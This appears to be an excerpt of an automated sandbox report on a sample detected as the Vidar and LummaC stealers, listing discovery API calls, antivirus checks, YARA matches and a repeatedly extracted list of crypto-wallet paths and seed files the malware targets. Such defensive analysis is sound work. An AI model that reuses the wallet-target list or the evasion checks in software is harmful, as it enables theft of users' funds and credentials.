Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 1_2_0042E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_00428F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00427706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 1_2_0042B7B3
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 8_2_001CC085
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW, 8_2_001C622B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001CC327
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001CC372
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001CC40D
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_001CC498
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW, 8_2_001CC6EB
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_001CC814
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW, 8_2_001CC91A
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_001CC9E9
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001C5D7F
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00DB7815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410C28 GetProcessHeap,HeapAlloc,GetUserNameA, 1_2_00410C28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 1_2_00410D03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.AAFIIJDAAA.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2216121534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.T2bmenoX1o.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
